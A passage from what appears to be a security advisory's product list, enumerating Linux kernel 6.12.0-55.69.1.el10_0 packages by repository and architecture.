"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
